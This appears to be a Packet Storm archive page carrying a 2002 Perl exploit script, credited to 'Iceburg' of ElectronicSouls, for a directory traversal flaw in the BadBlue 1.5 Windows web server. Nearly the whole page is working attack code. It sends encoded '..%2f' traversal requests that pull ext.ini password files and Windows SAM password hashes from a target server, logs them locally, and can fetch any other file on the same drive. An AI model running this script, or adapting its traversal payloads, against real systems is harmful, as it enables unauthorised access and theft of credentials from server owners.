exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

badexploit.txt

badexploit.txt
Posted Jul 6, 2002
Authored by Iceburg, electronicsouls | Site es.xor.ru

Badblue webserver v1.5 for Windows remote directory traversal exploit.

tags | exploit, remote
systems | windows
SHA-256 | a54d11c4fc9cf04a8c8071a4aec7f365e1cae05097b86eecfeb8f67e5513a8f8

badexploit.txt

Change Mirror Download
#!/usr/bin/perl
#
# - [ElectronicSouls] Private Do Not Distrobute -
#
# Remote Exploit For BadBlue 1.5 Web Server
# www.badblue.com
#
# A transversal bug has been discovered in
# BadBlue HTTP Daemon SoftWare. This is a
# gay bug, yes I know. But it can be kinda
# funny for those days you are bored =)
#
# Vulnerable System: Windows 95
# Windows 98
# Windows ME
# Windows NT 3.5
# Windows NT 4.0
# Windows 2000
# Windows XP
#
# syntax:
#
# -h --- Specify Host Name
# -p --- Specify Host Port
# -o --- For Grabbing Anothern file
# -l --- For Logging.
# -O --- Specify What OS
# 9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
# NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
# 2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
# XP --- For Windows XP ALL
#
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -o 2X - For Win/2K/XP
#
# *************************************************************************
# ** For the '-o' syntax you need to know the exact location of the file **
# ** NOTE! You can only get files from the same drive as BadBlue **
# ** **
# ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini **
# ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o boot.ini } **
# ** Now check es.log for the contents of boot.ini =) **
# *************************************************************************
#
# You'll figure it out, If you don't understand.
#
# Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK
# kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief
# CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else
# [!ElectronicSouls], HHP
#
# Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@
#
# Bug discovered and written by Iceburg of [!ElectronicSouls].


use Socket;
use Getopt::Std;

getopts("O:o:h:p:l:", \%args);

print ("\n");
print ("==================================================\n");
print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n");
print ("== -- Discovered and Written By Iceburg ==\n");
print ("== -- [ElectronicSouls] Production. ==\n");
print ("==================================================\n");
print ("\n");

if (!defined $args{h}) {
print qq~

syntax:

-h --- Specify Host Name
-p --- Specify Host Port
-o --- For Grabbing Anothern file
-l --- For Logging.
-O --- Specify What OS
--9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
--NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
--2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
--XP --- For Windows XP ALL

Syntax are case sensitive =)

~; exit; }

if (defined $args{h}) { $host=$args{h}; print "*** Exploiting $host ...\n"; }
if (defined $args{p}) { $port = $args{p} } else { $port = "80"; }

if (defined $args{l}) {
$file=$args{l};
$log=1;
open (LOG,">$file") || die ("*** Cannot open file for logging\n");
print LOG ("*** [ElectronicSouls] Production\n");
print LOG ("*** BadBlue 1.5 Remote Exploit\n");
print LOG ("*** Discovered And Written By Iceburg\n\n"); }

# This is like eleet unicode.
# I know more but I am too lazy to type it out.
# If these don't work try adding some more ..%2F||252f||255c..
# These are for default directories, if the directory ain't default
# it won't work, therefor you can use '-o' syntax.

# Win9x/mE Strings && WinNT/2K/XP

@sploits1 = (
"[ElectronicSouls]/..%2f../ext.ini", # Main String
"[0WNZ]/..%252f..%252f../ext.ini", # Alternative
"[YOU]/..%255c..%255c../ext.ini", ); # Alternative

# WinNT Strings

@sploits2 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",);

# Win2K Strings

@sploits3 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",);

# WinXP String

@sploits4 = (
"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",);


if (defined $args{o}) {
$string = $args{o};
print ("*** Using Manual String $string\n");
&connect;
send(SOCK,"GET /$string HTTP/1.0\r\n\r\n",0);

@ocheck=<SOCK>;
($http,$code,$blah) = split(/ /,$ocheck[0]);
if($code == 200) {

print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("=========================\n");
print ("\n @ocheck\n");
print ("=========================\n");

if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("@ocheck\n"); }
if ($log) { print LOG ("==========================\n"); }

die ("*** J00 15 kr4d+LUC|<Y+hax0r n0w\n\n"); } else { print ("*** SORRY J00 kr4|) H4x0r 7r1x0r d1|) n07 w3r|<\n\n"); }
}

if (defined $args{O}) {
if ($args{O} =~ "XP") { print ("*** Probing WinXP - ALL\n\n"); test4(); }
if ($args{O} =~ "2K") { print ("*** Probing Win2K - SP1-2\n\n"); test3(); }
if ($args{O} =~ "NT") { print ("*** Probing WinNT - 3/4\n\n"); test2(); }
if ($args{O} =~ "9x") { print ("*** Probing Win9x - ME\n\n"); test1(); }
}

sub test4 {

foreach $xploit4 (@sploits4) {
&connect;
send(SOCK,"GET /$xploit4 HTTP/1.0\r\n\r\n",0);

@check4=<SOCK>;
($http,$code,$blah) = split(/ /,$check4[0]);
if($code == 200) {

print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");

open(SAM,">sam") || error();

my $x;

for ($x=8;$x<=30;$x++) {
print SAM ("$check4[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit4\n"); }
close(SOCK); }
}

sub test3 {

foreach $xploit3 (@sploits3) {
&connect;
send(SOCK,"GET /$xploit3 HTTP/1.0\r\n\r\n",0);

@check3=<SOCK>;
($http,$code,$blah) = split(/ /,$check3[0]);
if($code == 200) {

print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");

open(SAM,">sam") || error();

my $x;

for ($x=8;$x<=30;$x++) {
print SAM ("$check3[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit3\n"); }
close(SOCK); }
}


sub test2 {

foreach $xploit2 (@sploits2) {
&connect;
send(SOCK,"GET /$xploit2 HTTP/1.0\r\n\r\n",0);

@check2=<SOCK>;
($http,$code,$blah) = split(/ /,$check2[0]);
if($code == 200) {

print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");

open(SAM,">sam") || error();

my $x;

for ($x=8;$x<=30;$x++) {
print SAM ("$check2[$x]\n");
}
test1();
} else { print ("*** Server is not vulberable to string $xploit2\n"); }
close(SOCK); }
}


sub test1 {

foreach $xploit1 (@sploits1) {
&connect;
send(SOCK,"GET /$xploit1 HTTP/1.0\r\n\r\n",0);

@check=<SOCK>;
#print "@check";
($http,$code,$blah) = split(/ /,$check[0]);
if($code == 200) {

print ("===============================\n");
print ("*** Getting contents of ext.ini\n");
print ("*** Server is vulnerable \n");
print ("===============================\n");
print ("\n @check\n");
print ("===============================\n");

if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("*** Contents of ext.ini \n"); }
if ($log) { print LOG ("==========================\n"); }
for ($i=8;$i<=@check;$i++) { if ($log) { print LOG ("$check[$i]"); } }
if ($log) { print LOG ("==========================\n"); }

die ("*** J00 15 kr4d-hax0r n0w\n");

} else { print ("*** Server is not vulberable to string $xploit1\n"); }
close(SOCK); }
}

sub connect {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($host) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
}

sub error {
print ("For some weird reason a error has occured: $!\n");
print ("Continueing ...\n");
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close